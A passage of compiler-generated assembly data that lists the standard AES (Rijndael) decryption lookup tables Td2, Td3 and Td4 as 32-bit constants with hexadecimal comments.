.long 3572145929 ; 0xd4ea9f09
.long 3593056380 ; 0xd629b07c
.long 2939266226 ; 0xaf31a4b2
.long 824852259 ; 0x312a3f23
.long 818324884 ; 0x30c6a594
.long 3224740454 ; 0xc035a266
.long 930369212 ; 0x37744ebc
.long 2801566410 ; 0xa6fc82ca
.long 2967507152 ; 0xb0e090d0
.long 355706840 ; 0x1533a7d8
.long 1257309336 ; 0x4af10498
.long 4148292826 ; 0xf741ecda
.long 243256656 ; 0xe7fcd50
.long 790073846 ; 0x2f1791f6
.long 2373340630 ; 0x8d764dd6
.long 1296297904 ; 0x4d43efb0
.long 1422699085 ; 0x54ccaa4d
.long 3756299780 ; 0xdfe49604
.long 3818836405 ; 0xe39ed1b5
.long 457992840 ; 0x1b4c6a88
.long 3099667487 ; 0xb8c12c1f
.long 2135319889 ; 0x7f466551
.long 77422314 ; 0x49d5eea
.long 1560382517 ; 0x5d018c35
.long 1945798516 ; 0x73fa8774
.long 788204353 ; 0x2efb0b41
.long 1521706781 ; 0x5ab3671d
.long 1385356242 ; 0x5292dbd2
.long 870912086 ; 0x33e91056
.long 325965383 ; 0x136dd647
.long 2358957921 ; 0x8c9ad761
.long 2050466060 ; 0x7a37a10c
.long 2388260884 ; 0x8e59f814
.long 2313884476 ; 0x89eb133c
.long 4006521127 ; 0xeecea927
.long 901210569 ; 0x35b761c9
.long 3990953189 ; 0xede11ce5
.long 1014646705 ; 0x3c7a47b1
.long 1503449823 ; 0x599cd2df
.long 1062597235 ; 0x3f55f273
.long 2031621326 ; 0x791814ce
.long 3212035895 ; 0xbf73c737
.long 3931371469 ; 0xea53f7cd
.long 1533017514 ; 0x5b5ffdaa
.long 350174575 ; 0x14df3d6f
.long 2256028891 ; 0x867844db
.long 2177544179 ; 0x81caaff3
.long 1052338372 ; 0x3eb968c4
.long 741876788 ; 0x2c382434
.long 1606591296 ; 0x5fc2a340
.long 1914052035 ; 0x72161dc3
.long 213705253 ; 0xcbce225
.long 2334669897 ; 0x8b283c49
.long 1107234197 ; 0x41ff0d95
.long 1899603969 ; 0x7139a801
.long 3725069491 ; 0xde080cb3
.long 2631447780 ; 0x9cd8b4e4
.long 2422494913 ; 0x906456c1
.long 1635502980 ; 0x617bcb84
.long 1893020342 ; 0x70d532b6
.long 1950903388 ; 0x74486c5c
.long 1120974935 ; 0x42d0b857
.p2align 2 ; @Td2
_Td2:
.long 2807058932 ; 0xa75051f4
.long 1699970625 ; 0x65537e41
.long 2764249623 ; 0xa4c31a17
.long 1586903591 ; 0x5e963a27
.long 1808481195 ; 0x6bcb3bab
.long 1173430173 ; 0x45f11f9d
.long 1487645946 ; 0x58abacfa
.long 59984867 ; 0x3934be3
.long 4199882800 ; 0xfa552030
.long 1844882806 ; 0x6df6ad76
.long 1989249228 ; 0x769188cc
.long 1277555970 ; 0x4c25f502
.long 3623636965 ; 0xd7fc4fe5
.long 3419915562 ; 0xcbd7c52a
.long 1149249077 ; 0x44802635
.long 2744104290 ; 0xa38fb562
.long 1514790577 ; 0x5a49deb1
.long 459744698 ; 0x1b6725ba
.long 244860394 ; 0xe9845ea
.long 3235995134 ; 0xc0e15dfe
.long 1963115311 ; 0x7502c32f
.long 4027744588 ; 0xf012814c
.long 2544078150 ; 0x97a38d46
.long 4190530515 ; 0xf9c66bd3
.long 1608975247 ; 0x5fe7038f
.long 2627016082 ; 0x9c951592
.long 2062270317 ; 0x7aebbf6d
.long 1507497298 ; 0x59da9552
.long 2200818878 ; 0x832dd4be
.long 567498868 ; 0x21d35874
.long 1764313568 ; 0x692949e0
.long 3359936201 ; 0xc8448ec9
.long 2305455554 ; 0x896a75c2
.long 2037970062 ; 0x7978f48e
.long 1047239000 ; 0x3e6b9958
.long 1910319033 ; 0x71dd27b9
.long 1337376481 ; 0x4fb6bee1
.long 2904027272 ; 0xad17f088
.long 2892417312 ; 0xac66c920
.long 984907214 ; 0x3ab47dce
.long 1243112415 ; 0x4a1863df
.long 830661914 ; 0x3182e51a
.long 861968209 ; 0x33609751
.long 2135253587 ; 0x7f456253
.long 2011214180 ; 0x77e0b164
.long 2927934315 ; 0xae84bb6b
.long 2686254721 ; 0xa01cfe81
.long 731183368 ; 0x2b94f908
.long 1750626376 ; 0x68587048
.long 4246310725 ; 0xfd198f45
.long 1820824798 ; 0x6c8794de
.long 4172763771 ; 0xf8b7527b
.long 3542330227 ; 0xd323ab73
.long 48394827 ; 0x2e2724b
.long 2404901663 ; 0x8f57e31f
.long 2871682645 ; 0xab2a6655
.long 671593195 ; 0x2807b2eb
.long 3254988725 ; 0xc2032fb5
.long 2073724613 ; 0x7b9a86c5
.long 145085239 ; 0x8a5d337
.long 2280796200 ; 0x87f23028
.long 2779915199 ; 0xa5b223bf
.long 1790575107 ; 0x6aba0203
.long 2187128086 ; 0x825ced16
.long 472615631 ; 0x1c2b8acf
.long 3029510009 ; 0xb492a779
.long 4075877127 ; 0xf2f0f307
.long 3802222185 ; 0xe2a14e69
.long 4107101658 ; 0xf4cd65da
.long 3201631749 ; 0xbed50605
.long 1646252340 ; 0x621fd134
.long 4270507174 ; 0xfe8ac4a6
.long 1402811438 ; 0x539d342e
.long 1436590835 ; 0x55a0a2f3
.long 3778151818 ; 0xe132058a
.long 3950355702 ; 0xeb75a4f6
.long 3963161475 ; 0xec390b83
.long 4020912224 ; 0xefaa4060
.long 2667994737 ; 0x9f065e71
.long 273792366 ; 0x1051bd6e
.long 2331590177 ; 0x8af93e21
.long 104699613 ; 0x63d96dd
.long 95345982 ; 0x5aedd3e
.long 3175501286 ; 0xbd464de6
.long 2377486676 ; 0x8db59154
.long 1560637892 ; 0x5d0571c4
.long 3564045318 ; 0xd46f0406
.long 369057872 ; 0x15ff6050
.long 4213447064 ; 0xfb241998
.long 3919042237 ; 0xe997d6bd
.long 1137477952 ; 0x43cc8940
.long 2658625497 ; 0x9e7767d9
.long 1119727848 ; 0x42bdb0e8
.long 2340947849 ; 0x8b880789
.long 1530455833 ; 0x5b38e719
.long 4007360968 ; 0xeedb79c8
.long 172466556 ; 0xa47a17c
.long 266959938 ; 0xfe97c42
.long 516552836 ; 0x1ec9f884
.long 0 ; 0x0
.long 2256734592 ; 0x86830980
.long 3980931627 ; 0xed48322b
.long 1890328081 ; 0x70ac1e11
.long 1917742170 ; 0x724e6c5a
.long 4294704398 ; 0xfffbfd0e
.long 945164165 ; 0x38560f85
.long 3575528878 ; 0xd51e3dae
.long 958871085 ; 0x3927362d
.long 3647212047 ; 0xd9640a0f
.long 2787207260 ; 0xa621685c
.long 1423022939 ; 0x54d19b5b
.long 775562294 ; 0x2e3a2436
.long 1739656202 ; 0x67b10c0a
.long 3876557655 ; 0xe70f9357
.long 2530391278 ; 0x96d2b4ee
.long 2443058075 ; 0x919e1b9b
.long 3310321856 ; 0xc54f80c0
.long 547512796 ; 0x20a261dc
.long 1265195639 ; 0x4b695a77
.long 437656594 ; 0x1a161c12
.long 3121275539 ; 0xba0ae293
.long 719700128 ; 0x2ae5c0a0
.long 3762502690 ; 0xe0433c22
.long 387781147 ; 0x171d121b
.long 218828297 ; 0xd0b0e09
.long 3350065803 ; 0xc7adf28b
.long 2830708150 ; 0xa8b92db6
.long 2848461854 ; 0xa9c8141e
.long 428169201 ; 0x198557f1
.long 122466165 ; 0x74caf75
.long 3720081049 ; 0xddbbee99
.long 1627235199 ; 0x60fda37f
.long 648017665 ; 0x269ff701
.long 4122762354 ; 0xf5bc5c72
.long 1002783846 ; 0x3bc54466
.long 2117360635 ; 0x7e345bfb
.long 695634755 ; 0x29768b43
.long 3336358691 ; 0xc6dccb23
.long 4234721005 ; 0xfc68b6ed
.long 4049844452 ; 0xf163b8e4
.long 3704280881 ; 0xdccad731
.long 2232435299 ; 0x85104263
.long 574624663 ; 0x22401397
.long 287343814 ; 0x112084c6
.long 612205898 ; 0x247d854a
.long 1039717051 ; 0x3df8d2bb
.long 840019705 ; 0x3211aef9
.long 2708326185 ; 0xa16dc729
.long 793451934 ; 0x2f4b1d9e
.long 821288114 ; 0x30f3dcb2
.long 1391201670 ; 0x52ec0d86
.long 3822090177 ; 0xe3d077c1
.long 376187827 ; 0x166c2bb3
.long 3113855344 ; 0xb999a970
.long 1224348052 ; 0x48fa1194
.long 1679968233 ; 0x642247e9
.long 2361698556 ; 0x8cc4a8fc
.long 1058709744 ; 0x3f1aa0f0
.long 752375421 ; 0x2cd8567d
.long 2431590963 ; 0x90ef2233
.long 1321699145 ; 0x4ec78749
.long 3519142200 ; 0xd1c1d938
.long 2734591178 ; 0xa2fe8cca
.long 188127444 ; 0xb3698d4
.long 2177869557 ; 0x81cfa6f5
.long 3727205754 ; 0xde28a57a
.long 2384911031 ; 0x8e26dab7
.long 3215212461 ; 0xbfa43fad
.long 2648976442 ; 0x9de42c3a
.long 2450346104 ; 0x920d5078
.long 3432737375 ; 0xcc9b6a5f
.long 1180849278 ; 0x4662547e
.long 331544205 ; 0x13c2f68d
.long 3102249176 ; 0xb8e890d8
.long 4150144569 ; 0xf75e2e39
.long 2952102595 ; 0xaff582c3
.long 2159976285 ; 0x80be9f5d
.long 2474404304 ; 0x937c69d0
.long 766078933 ; 0x2da96fd5
.long 313773861 ; 0x12b3cf25
.long 2570832044 ; 0x993bc8ac
.long 2108100632 ; 0x7da71018
.long 1668212892 ; 0x636ee89c
.long 3145456443 ; 0xbb7bdb3b
.long 2013908262 ; 0x7809cd26
.long 418672217 ; 0x18f46e59
.long 3070356634 ; 0xb701ec9a
.long 2594734927 ; 0x9aa8834f
.long 1852171925 ; 0x6e65e695
.long 3867060991 ; 0xe67eaaff
.long 3473416636 ; 0xcf0821bc
.long 3907448597 ; 0xe8e6ef15
.long 2614737639 ; 0x9bd9bae7
.long 919489135 ; 0x36ce4a6f
.long 164948639 ; 0x9d4ea9f
.long 2094410160 ; 0x7cd629b0
.long 2997825956 ; 0xb2af31a4
.long 590424639 ; 0x23312a3f
.long 2486224549 ; 0x9430c6a5
.long 1723872674 ; 0x66c035a2
.long 3157750862 ; 0xbc37744e
.long 3399941250 ; 0xcaa6fc82
.long 3501252752 ; 0xd0b0e090
.long 3625268135 ; 0xd81533a7
.long 2555048196 ; 0x984af104
.long 3673637356 ; 0xdaf741ec
.long 1343127501 ; 0x500e7fcd
.long 4130281361 ; 0xf62f1791
.long 3599595085 ; 0xd68d764d
.long 2957853679 ; 0xb04d43ef
.long 1297403050 ; 0x4d54ccaa
.long 81781910 ; 0x4dfe496
.long 3051593425 ; 0xb5e39ed1
.long 2283490410 ; 0x881b4c6a
.long 532201772 ; 0x1fb8c12c
.long 1367295589 ; 0x517f4665
.long 3926170974 ; 0xea049d5e
.long 895287692 ; 0x355d018c
.long 1953757831 ; 0x7473fa87
.long 1093597963 ; 0x412efb0b
.long 492483431 ; 0x1d5ab367
.long 3528626907 ; 0xd25292db
.long 1446242576 ; 0x5633e910
.long 1192455638 ; 0x47136dd6
.long 1636604631 ; 0x618c9ad7
.long 209336225 ; 0xc7a37a1
.long 344873464 ; 0x148e59f8
.long 1015671571 ; 0x3c89eb13
.long 669961897 ; 0x27eecea9
.long 3375740769 ; 0xc935b761
.long 3857572124 ; 0xe5ede11c
.long 2973530695 ; 0xb13c7a47
.long 3747192018 ; 0xdf599cd2
.long 1933530610 ; 0x733f55f2
.long 3464042516 ; 0xce791814
.long 935293895 ; 0x37bf73c7
.long 3454686199 ; 0xcdea53f7
.long 2858115069 ; 0xaa5b5ffd
.long 1863638845 ; 0x6f14df3d
.long 3683022916 ; 0xdb867844
.long 4085369519 ; 0xf381caaf
.long 3292445032 ; 0xc43eb968
.long 875313188 ; 0x342c3824
.long 1080017571 ; 0x405fc2a3
.long 3279033885 ; 0xc372161d
.long 621591778 ; 0x250cbce2
.long 1233856572 ; 0x498b283c
.long 2504130317 ; 0x9541ff0d
.long 24197544 ; 0x17139a8
.long 3017672716 ; 0xb3de080c
.long 3835484340 ; 0xe49cd8b4
.long 3247465558 ; 0xc1906456
.long 2220981195 ; 0x84617bcb
.long 3060847922 ; 0xb670d532
.long 1551124588 ; 0x5c74486c
.long 1463996600 ; 0x5742d0b8
.p2align 2 ; @Td3
_Td3:
.long 4104605777 ; 0xf4a75051
.long 1097159550 ; 0x4165537e
.long 396673818 ; 0x17a4c31a
.long 660510266 ; 0x275e963a
.long 2875968315 ; 0xab6bcb3b
.long 2638606623 ; 0x9d45f11f
.long 4200115116 ; 0xfa58abac
.long 3808662347 ; 0xe303934b
.long 821712160 ; 0x30fa5520
.long 1986918061 ; 0x766df6ad
.long 3430322568 ; 0xcc769188
.long 38544885 ; 0x24c25f5
.long 3856137295 ; 0xe5d7fc4f
.long 718002117 ; 0x2acbd7c5
.long 893681702 ; 0x35448026
.long 1654886325 ; 0x62a38fb5
.long 2975484382 ; 0xb15a49de
.long 3122358053 ; 0xba1b6725
.long 3926825029 ; 0xea0e9845
.long 4274053469 ; 0xfec0e15d
.long 796197571 ; 0x2f7502c3
.long 1290801793 ; 0x4cf01281
.long 1184342925 ; 0x4697a38d
.long 3556361835 ; 0xd3f9c66b
.long 2405426947 ; 0x8f5fe703
.long 2459735317 ; 0x929c9515
.long 1836772287 ; 0x6d7aebbf
.long 1381620373 ; 0x5259da95
.long 3196267988 ; 0xbe832dd4
.long 1948373848 ; 0x7421d358
.long 3764988233 ; 0xe0692949
.long 3385345166 ; 0xc9c8448e
.long 3263785589 ; 0xc2896a75
.long 2390325492 ; 0x8e7978f4
.long 1480485785 ; 0x583e6b99
.long 3111247143 ; 0xb971dd27
.long 3780097726 ; 0xe14fb6be
.long 2293045232 ; 0x88ad17f0
.long 548169417 ; 0x20ac66c9
.long 3459953789 ; 0xce3ab47d
.long 3746175075 ; 0xdf4a1863
.long 439452389 ; 0x1a3182e5
.long 1362321559 ; 0x51336097
.long 1400849762 ; 0x537f4562
.long 1685577905 ; 0x6477e0b1
.long 1806599355 ; 0x6bae84bb
.long 2174754046 ; 0x81a01cfe
.long 137073913 ; 0x82b94f9
.long 1214797936 ; 0x48685870
.long 1174215055 ; 0x45fd198f
.long 3731654548 ; 0xde6c8794
.long 2079897426 ; 0x7bf8b752
.long 1943217067 ; 0x73d323ab
.long 1258480242 ; 0x4b02e272
.long 529487843 ; 0x1f8f57e3
.long 1437280870 ; 0x55ab2a66
.long 3945269170 ; 0xeb2807b2
.long 3049390895 ; 0xb5c2032f
.long 3313212038 ; 0xc57b9a86
.long 923313619 ; 0x3708a5d3
.long 679998000 ; 0x2887f230
.long 3215307299 ; 0xbfa5b223
.long 57326082 ; 0x36aba02
.long 377642221 ; 0x16825ced
.long 3474729866 ; 0xcf1c2b8a
.long 2041877159 ; 0x79b492a7
.long 133361907 ; 0x7f2f0f3
.long 1776460110 ; 0x69e2a14e
.long 3673476453 ; 0xdaf4cd65
.long 96392454 ; 0x5bed506
.long 878845905 ; 0x34621fd1
.long 2801699524 ; 0xa6fe8ac4
.long 777231668 ; 0x2e539d34
.long 4082475170 ; 0xf355a0a2
.long 2330014213 ; 0x8ae13205
.long 4142626212 ; 0xf6eb75a4
.long 2213296395 ; 0x83ec390b
.long 1626319424 ; 0x60efaa40
.long 1906247262 ; 0x719f065e
.long 1846563261 ; 0x6e1051bd
.long 562755902 ; 0x218af93e
.long 3708173718 ; 0xdd063d96
.long 1040559837 ; 0x3e05aedd
.long 3871163981 ; 0xe6bd464d
.long 1418573201 ; 0x548db591
.long 3294430577 ; 0xc45d0571
.long 114585348 ; 0x6d46f04
.long 1343618912 ; 0x5015ff60
.long 2566595609 ; 0x98fb2419
.long 3186202582 ; 0xbde997d6
.long 1078185097 ; 0x4043cc89
.long 3651041127 ; 0xd99e7767
.long 3896688048 ; 0xe842bdb0
.long 2307622919 ; 0x898b8807
.long 425408743 ; 0x195b38e7
.long 3371096953 ; 0xc8eedb79
.long 2081048481 ; 0x7c0a47a1
.long 1108339068 ; 0x420fe97c
.long 2216610296 ; 0x841ec9f8
.long 0 ; 0x0
.long 2156299017 ; 0x80868309
.long 736970802 ; 0x2bed4832
.long 292596766 ; 0x1170ac1e
.long 1517440620 ; 0x5a724e6c
.long 251657213 ; 0xefffbfd
.long 2235061775 ; 0x8538560f
.long 2933202493 ; 0xaed51e3d
.long 758720310 ; 0x2d392736
.long 265905162 ; 0xfd9640a
.long 1554391400 ; 0x5ca62168
.long 1532285339 ; 0x5b54d19b
.long 908999204 ; 0x362e3a24
.long 174567692 ; 0xa67b10c
.long 1474760595 ; 0x57e70f93
.long 4002861748 ; 0xee96d2b4
.long 2610011675 ; 0x9b919e1b
.long 3234156416 ; 0xc0c54f80
.long 3693126241 ; 0xdc20a261
.long 2001430874 ; 0x774b695a
.long 303699484 ; 0x121a161c
.long 2478443234 ; 0x93ba0ae2
.long 2687165888 ; 0xa02ae5c0
.long 585122620 ; 0x22e0433c
.long 454499602 ; 0x1b171d12
.long 151849742 ; 0x90d0b0e
.long 2345119218 ; 0x8bc7adf2
.long 3064510765 ; 0xb6a8b92d
.long 514443284 ; 0x1ea9c814
.long 4044981591 ; 0xf1198557
.long 1963412655 ; 0x75074caf
.long 2581445614 ; 0x99ddbbee
.long 2137062819 ; 0x7f60fda3
.long 19308535 ; 0x1269ff7
.long 1928707164 ; 0x72f5bc5c
.long 1715193156 ; 0x663bc544
.long 4219352155 ; 0xfb7e345b
.long 1126790795 ; 0x4329768b
.long 600235211 ; 0x23c6dccb
.long 3992742070 ; 0xedfc68b6
.long 3841024952 ; 0xe4f163b8
.long 836553431 ; 0x31dccad7
.long 1669664834 ; 0x63851042
.long 2535604243 ; 0x97224013
.long 3323011204 ; 0xc6112084
.long 1243905413 ; 0x4a247d85
.long 3141400786 ; 0xbb3df8d2
.long 4180808110 ; 0xf93211ae
.long 698445255 ; 0x29a16dc7
.long 2653899549 ; 0x9e2f4b1d
.long 2989552604 ; 0xb230f3dc
.long 2253581325 ; 0x8652ec0d
.long 3252932727 ; 0xc1e3d077
.long 3004591147 ; 0xb3166c2b
.long 1891211689 ; 0x70b999a9
.long 2487810577 ; 0x9448fa11
.long 3915653703 ; 0xe9642247
.long 4237083816 ; 0xfc8cc4a8
.long 4030667424 ; 0xf03f1aa0
.long 2100090966 ; 0x7d2cd856
.long 865136418 ; 0x3390ef22
.long 1229899655 ; 0x494ec787
.long 953270745 ; 0x38d1c1d9
.long 3399679628 ; 0xcaa2fe8c
.long 3557504664 ; 0xd40b3698
.long 4118925222 ; 0xf581cfa6
.long 2061379749 ; 0x7ade28a5
.long 3079546586 ; 0xb78e26da
.long 2915017791 ; 0xadbfa43f
.long 983426092 ; 0x3a9de42c
.long 2022837584 ; 0x78920d50
.long 1607244650 ; 0x5fcc9b6a
.long 2118541908 ; 0x7e466254
.long 2366882550 ; 0x8d13c2f6
.long 3635996816 ; 0xd8b8e890
.long 972512814 ; 0x39f75e2e
.long 3283088770 ; 0xc3aff582
.long 1568718495 ; 0x5d80be9f
.long 3499326569 ; 0xd0937c69
.long 3576539503 ; 0xd52da96f
.long 621982671 ; 0x2512b3cf
.long 2895723464 ; 0xac993bc8
.long 410887952 ; 0x187da710
.long 2623762152 ; 0x9c636ee8
.long 1002142683 ; 0x3bbb7bdb
.long 645401037 ; 0x267809cd
.long 1494807662 ; 0x5918f46e
.long 2595684844 ; 0x9ab701ec
.long 1335535747 ; 0x4f9aa883
.long 2507040230 ; 0x956e65e6
.long 4293295786 ; 0xffe67eaa
.long 3167684641 ; 0xbccf0821
.long 367585007 ; 0x15e8e6ef
.long 3885750714 ; 0xe79bd9ba
.long 1865862730 ; 0x6f36ce4a
.long 2668221674 ; 0x9f09d4ea
.long 2960971305 ; 0xb07cd629
.long 2763173681 ; 0xa4b2af31
.long 1059270954 ; 0x3f23312a
.long 2777952454 ; 0xa59430c6
.long 2724642869 ; 0xa266c035
.long 1320957812 ; 0x4ebc3774
.long 2194319100 ; 0x82caa6fc
.long 2429595872 ; 0x90d0b0e0
.long 2815956275 ; 0xa7d81533
.long 77089521 ; 0x4984af1
.long 3973773121 ; 0xecdaf741
.long 3444575871 ; 0xcd500e7f
.long 2448830231 ; 0x91f62f17
.long 1305906550 ; 0x4dd68d76
.long 4021308739 ; 0xefb04d43
.long 2857194700 ; 0xaa4d54cc
.long 2516901860 ; 0x9604dfe4
.long 3518358430 ; 0xd1b5e39e
.long 1787304780 ; 0x6a881b4c
.long 740276417 ; 0x2c1fb8c1
.long 1699839814 ; 0x65517f46
.long 1592394909 ; 0x5eea049d
.long 2352307457 ; 0x8c355d01
.long 2272556026 ; 0x877473fa
.long 188821243 ; 0xb412efb
.long 1729977011 ; 0x671d5ab3
.long 3687994002 ; 0xdbd25292
.long 274084841 ; 0x105633e9
.long 3594982253 ; 0xd647136d
.long 3613494426 ; 0xd7618c9a
.long 2701949495 ; 0xa10c7a37
.long 4162096729 ; 0xf8148e59
.long 322734571 ; 0x133c89eb
.long 2837966542 ; 0xa927eece
.long 1640576439 ; 0x61c935b7
.long 484830689 ; 0x1ce5ede1
.long 1202797690 ; 0x47b13c7a
.long 3537852828 ; 0xd2df599c
.long 4067639125 ; 0xf2733f55
.long 349075736 ; 0x14ce7918
.long 3342319475 ; 0xc737bf73
.long 4157467219 ; 0xf7cdea53
.long 4255800159 ; 0xfdaa5b5f
.long 1030690015 ; 0x3d6f14df
.long 1155237496 ; 0x44db8678
.long 2951971274 ; 0xaff381ca
.long 1757691577 ; 0x68c43eb9
.long 607398968 ; 0x24342c38
.long 2738905026 ; 0xa3405fc2
.long 499347990 ; 0x1dc37216
.long 3794078908 ; 0xe2250cbc
.long 1011452712 ; 0x3c498b28
.long 227885567 ; 0xd9541ff
.long 2818666809 ; 0xa8017139
.long 213114376 ; 0xcb3de08
.long 3034881240 ; 0xb4e49cd8
.long 1455525988 ; 0x56c19064
.long 3414450555 ; 0xcb84617b
.long 850817237 ; 0x32b670d5
.long 1817998408 ; 0x6c5c7448
.long 3092726480 ; 0xb85742d0
.p2align 2 ; @Td4
_Td4:
.long 1381126738 ; 0x52525252
.long 151587081 ; 0x9090909
.long 1785358954 ; 0x6a6a6a6a
.long 3587560917 ; 0xd5d5d5d5
.long 808464432 ; 0x30303030
.long 909522486 ; 0x36363636
.long 2779096485 ; 0xa5a5a5a5
.long 943208504 ; 0x38383838
.long 3217014719 ; 0xbfbfbfbf
.long 1077952576 ; 0x40404040
.long 2745410467 ; 0xa3a3a3a3
.long 2661195422 ; 0x9e9e9e9e
.long 2172748161 ; 0x81818181
.long 4092851187 ; 0xf3f3f3f3
.long 3621246935 ; 0xd7d7d7d7
.long 4227595259 ; 0xfbfbfbfb
.long 2088533116 ; 0x7c7c7c7c
.long 3823363043 ; 0xe3e3e3e3
.long 960051513 ; 0x39393939
.long 2189591170 ; 0x82828282
.long 2610666395 ; 0x9b9b9b9b
.long 791621423 ; 0x2f2f2f2f
.long 4294967295 ; 0xffffffff
.long 2273806215 ; 0x87878787
.long 875836468 ; 0x34343434
.long 2391707278 ; 0x8e8e8e8e
.long 1128481603 ; 0x43434343
.long 1145324612 ; 0x44444444
.long 3301229764 ; 0xc4c4c4c4
.long 3739147998 ; 0xdededede
.long 3924421097 ; 0xe9e9e9e9
.long 3419130827 ; 0xcbcbcbcb
.long 1414812756 ; 0x54545454
.long 2071690107 ; 0x7b7b7b7b
.long 2492765332 ; 0x94949494
.long 842150450 ; 0x32323232
.long 2795939494 ; 0xa6a6a6a6
.long 3267543746 ; 0xc2c2c2c2
.long 589505315 ; 0x23232323
.long 1027423549 ; 0x3d3d3d3d
.long 4008636142 ; 0xeeeeeeee
.long 1280068684 ; 0x4c4c4c4c
.long 2509608341 ; 0x95959595
.long 185273099 ; 0xb0b0b0b
.long 1111638594 ; 0x42424242
.long 4210752250 ; 0xfafafafa
.long 3284386755 ; 0xc3c3c3c3
.long 1313754702 ; 0x4e4e4e4e
.long 134744072 ; 0x8080808
.long 774778414 ; 0x2e2e2e2e
.long 2711724449 ; 0xa1a1a1a1
.long 1717986918 ; 0x66666666
.long 673720360 ; 0x28282828
.long 3654932953 ; 0xd9d9d9d9
.long 606348324 ; 0x24242424
.long 2998055602 ; 0xb2b2b2b2
.long 1987475062 ; 0x76767676
.long 1532713819 ; 0x5b5b5b5b
.long 2728567458 ; 0xa2a2a2a2
.long 1229539657 ; 0x49494949
.long 1835887981 ; 0x6d6d6d6d
.long 2341178251 ; 0x8b8b8b8b
.long 3520188881 ; 0xd1d1d1d1
.long 623191333 ; 0x25252525
.long 1920103026 ; 0x72727272
.long 4177066232 ; 0xf8f8f8f8
.long 4143380214 ; 0xf6f6f6f6
.long 1684300900 ; 0x64646464
.long 2256963206 ; 0x86868686
.long 1751672936 ; 0x68686868
.long 2560137368 ; 0x98989898
.long 370546198 ; 0x16161616
.long 3570717908 ; 0xd4d4d4d4
.long 2762253476 ; 0xa4a4a4a4
.long 1549556828 ; 0x5c5c5c5c
.long 3435973836 ; 0xcccccccc
.long 1566399837 ; 0x5d5d5d5d
.long 1701143909 ; 0x65656565
.long 3065427638 ; 0xb6b6b6b6
.long 2459079314 ; 0x92929292
.long 1819044972 ; 0x6c6c6c6c
.long 1886417008 ; 0x70707070
.long 1212696648 ; 0x48484848
.long 1347440720 ; 0x50505050
.long 4261281277 ; 0xfdfdfdfd
.long 3991793133 ; 0xedededed
.long 3115956665 ; 0xb9b9b9b9
.long 3671775962 ; 0xdadadada
.long 1583242846 ; 0x5e5e5e5e
.long 353703189 ; 0x15151515
.long 1179010630 ; 0x46464646
.long 1465341783 ; 0x57575757
.long 2812782503 ; 0xa7a7a7a7
.long 2374864269 ; 0x8d8d8d8d
.long 2644352413 ; 0x9d9d9d9d
.long 2223277188 ; 0x84848484
.long 2425393296 ; 0x90909090
.long 3638089944 ; 0xd8d8d8d8
.long 2880154539 ; 0xabababab
.long 0 ; 0x0
.long 2358021260 ; 0x8c8c8c8c
.long 3166485692 ; 0xbcbcbcbc
.long 3553874899 ; 0xd3d3d3d3
.long 168430090 ; 0xa0a0a0a
.long 4160223223 ; 0xf7f7f7f7
.long 3840206052 ; 0xe4e4e4e4
.long 1482184792 ; 0x58585858
.long 84215045 ; 0x5050505
.long 3099113656 ; 0xb8b8b8b8
.long 3014898611 ; 0xb3b3b3b3
.long 1162167621 ; 0x45454545
.long 101058054 ; 0x6060606
.long 3503345872 ; 0xd0d0d0d0
.long 741092396 ; 0x2c2c2c2c
.long 505290270 ; 0x1e1e1e1e
.long 2408550287 ; 0x8f8f8f8f
.long 3402287818 ; 0xcacacaca
.long 1061109567 ; 0x3f3f3f3f
.long 252645135 ; 0xf0f0f0f
.long 33686018 ; 0x2020202
.long 3250700737 ; 0xc1c1c1c1
.long 2947526575 ; 0xafafafaf
.long 3183328701 ; 0xbdbdbdbd
.long 50529027 ; 0x3030303
.long 16843009 ; 0x1010101
.long 320017171 ; 0x13131313
.long 2324335242 ; 0x8a8a8a8a
.long 1802201963 ; 0x6b6b6b6b
.long 976894522 ; 0x3a3a3a3a
.long 2442236305 ; 0x91919191
.long 286331153 ; 0x11111111
.long 1094795585 ; 0x41414141
.long 1330597711 ; 0x4f4f4f4f
.long 1734829927 ; 0x67676767
.long 3705461980 ; 0xdcdcdcdc
.long 3941264106 ; 0xeaeaeaea
.long 2543294359 ; 0x97979797
.long 4076008178 ; 0xf2f2f2f2
.long 3486502863 ; 0xcfcfcfcf
.long 3469659854 ; 0xcececece
.long 4042322160 ; 0xf0f0f0f0
.long 3031741620 ; 0xb4b4b4b4
.long 3873892070 ; 0xe6e6e6e6
.long 1936946035 ; 0x73737373
.long 2526451350 ; 0x96969696
.long 2896997548 ; 0xacacacac
.long 1953789044 ; 0x74747474
.long 572662306 ; 0x22222222
.long 3890735079 ; 0xe7e7e7e7
.long 2913840557 ; 0xadadadad
.long 892679477 ; 0x35353535
.long 2240120197 ; 0x85858585
.long 3806520034 ; 0xe2e2e2e2
.long 4193909241 ; 0xf9f9f9f9
.long 926365495 ; 0x37373737
.long 3907578088 ; 0xe8e8e8e8
.long 471604252 ; 0x1c1c1c1c
.long 1970632053 ; 0x75757575
.long 3755991007 ; 0xdfdfdfdf
.long 1852730990 ; 0x6e6e6e6e
.long 1195853639 ; 0x47474747
.long 4059165169 ; 0xf1f1f1f1
.long 437918234 ; 0x1a1a1a1a
.long 1903260017 ; 0x71717171
.long 488447261 ; 0x1d1d1d1d
.long 690563369 ; 0x29292929
.long 3318072773 ; 0xc5c5c5c5
.long 2307492233 ; 0x89898989
.long 1869573999 ; 0x6f6f6f6f
.long 3082270647 ; 0xb7b7b7b7
.long 1650614882 ; 0x62626262
.long 235802126 ; 0xe0e0e0e
.long 2863311530 ; 0xaaaaaaaa
.long 404232216 ; 0x18181818
.long 3200171710 ; 0xbebebebe
.long 454761243 ; 0x1b1b1b1b
.long 4244438268 ; 0xfcfcfcfc
.long 1448498774 ; 0x56565656
.long 1044266558 ; 0x3e3e3e3e
.long 1263225675 ; 0x4b4b4b4b
.long 3334915782 ; 0xc6c6c6c6
.long 3537031890 ; 0xd2d2d2d2
.long 2038004089 ; 0x79797979
.long 538976288 ; 0x20202020
.long 2593823386 ; 0x9a9a9a9a
.long 3688618971 ; 0xdbdbdbdb
.long 3233857728 ; 0xc0c0c0c0
.long 4278124286 ; 0xfefefefe
.long 2021161080 ; 0x78787878
.long 3452816845 ; 0xcdcdcdcd
.long 1515870810 ; 0x5a5a5a5a
.long 4109694196 ; 0xf4f4f4f4
.long 522133279 ; 0x1f1f1f1f
.long 3722304989 ; 0xdddddddd
.long 2829625512 ; 0xa8a8a8a8
.long 858993459 ; 0x33333333
.long 2290649224 ; 0x88888888
.long 117901063 ; 0x7070707
.long 3351758791 ; 0xc7c7c7c7
.long 825307441 ; 0x31313131
.long 2981212593 ; 0xb1b1b1b1
.long 303174162 ; 0x12121212
